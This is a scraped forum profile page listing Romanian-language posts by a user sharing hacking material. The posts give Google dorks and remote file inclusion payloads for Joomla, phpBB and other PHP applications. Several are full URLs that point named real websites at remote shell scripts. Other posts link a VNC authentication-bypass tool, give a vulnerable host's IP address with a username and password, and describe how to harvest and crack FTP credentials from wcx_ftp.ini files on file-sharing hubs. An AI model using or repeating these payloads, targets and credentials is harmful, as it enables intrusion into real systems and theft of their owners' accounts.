mozi
-
Posts
175 -
Joined
-
Last visited
-
Days Won
1
Posts posted by mozi
-
-
ddork:"index.php?option=com_facileforms"
POC:components/com_facileforms/facileforms.frame.php?ff_compath=http://evil
exemplu:
not public again .. :
-
dork:"powered by pdshoppro"
site.com/$path/ data/pdshoppro.mdb
-
-
-
-
allinurl:"index.php?target=categories"
-
mai sunt si care sunt publice frate ce vrei acuma am bagat si cateva de la mine
-
pfuu nu am stiut ma ms
-
ddork:allinurl:com_remository
administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
example:
-
if(!$_AMGinclude['res_spamcontrol'] = include("$_AMGconfig[cfg_serverpath]/include/spamcontrol.inc.php"))
-
modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
:D
require_once("$_AMGconfig[cfg_serverpath]"."/include/template.inc.php");
-
ddork:allinurl:=AllMyGuests
cateva exemple
http://www.gazikoy.com/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://vembazax.org/bius/cmd.do?
http://www.alanya.cd/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://vembazax.org/bius/cmd.do?
http://fintclub.ru/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://vembazax.org/bius/cmd.do?
-
mai bine dai asa
ddork:inurl:inurl:com_reporter
components/com_reporter/reporter.logic.php?mosConfig_absolute_path=
-
scanatzi'>http://www.geocities.com/mozi2weed/05162006_BL4CK_vncviewer_authbypass.zip
scanatzi dupa port 5900
si incerkati imposibil sa nu faceti un bypass la vreun server
byapss adica sa intrat fara sa folositi parola direct p server...
have phun!
vuln host 198.189.134.118
si daca nu va merge cu bypass va dau si user ssa intrati p el
tsinternetuser 123456z
-
acuma
direkt la subiect
multzi folosesc programu ptru a intra p ftp`uri
si tm lasa un log wcx_ftp.ini
server
user
pass=cryptat -- foarte usor de spart
cum luam de la victime wcx_ftp.ini
de pe huburi cu odc
intram p o retzea cautam fisieru
wcx_ftp.ini
multe fto de .ro am luat
have phun !
daca aveti probleme de decryptat parola postati ca fac un upload la program
-
-
-
-
doork: allinurl:/com_linkdirectory
examples
if (file_exists($mosConfig_absolute_path."/administrator/components/com_linkdirectory/language/".$mosConfig_lang.".php")){
include($mosConfig_absolute_path."/administrator/components/com_linkdirectory/language/".$mosConfig_lang.".php");
}else{
include($mosConfig_absolute_path."/administrator/components/com_linkdirectory/language/english.php");
}
-
ddork :: allinurl:index.php?target=forms
install.php?install_dir=
mylast dork in forum for more php bugs
-
inurl:rdf_album.php or inurl:plusxl20
includes/functions.php?phpbb_root_path=
-
define('IN_PHPBB', true);
//$phpbb_root_path = $mosConfig_absolute_path . '/components/com_forum/';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
http://www.gtbaa.org/components/com_forum/faq.php?phpbb_root_path=http://tanpa-kekasih.info/cmd.do?
gdork:"phpBB component v1.2.2."
-
in config.php
<?
//Website Path
$path["webroot"]="";
//Document Path
$path["docroot"]="";
//Include all the necessary classes and files. Don't modify.
ini_set("display_errors",true);
error_reporting(E_ALL ^ E_NOTICE);
include_once($path["docroot"]."common/include.php");
exemplu:
http://www.gbcnv.edu/webservices/newspublish/include.php?path[docroot]=http://tanpa-kekasih.info/cmd.do?
ohh and dork
google: allinurl:/home.tell.php?news_id
-
era un bug in pagina aia .. de sql ... mult timp era vuln situ lor ... dar vad ca acuma or facut path asta este
nu am mai postat de mult rfi asa ca :D agian :)
in Exploituri
Posted
da ma .. asa .. eu l-am folosit il am de mult ..
dar nu e pe 1000
de situri
ca si plm altu de e pus p milw0rm de exemplu .
si daca gasesc azi un rfi si il folosesc 3 zile o sa`l dea asa
e bun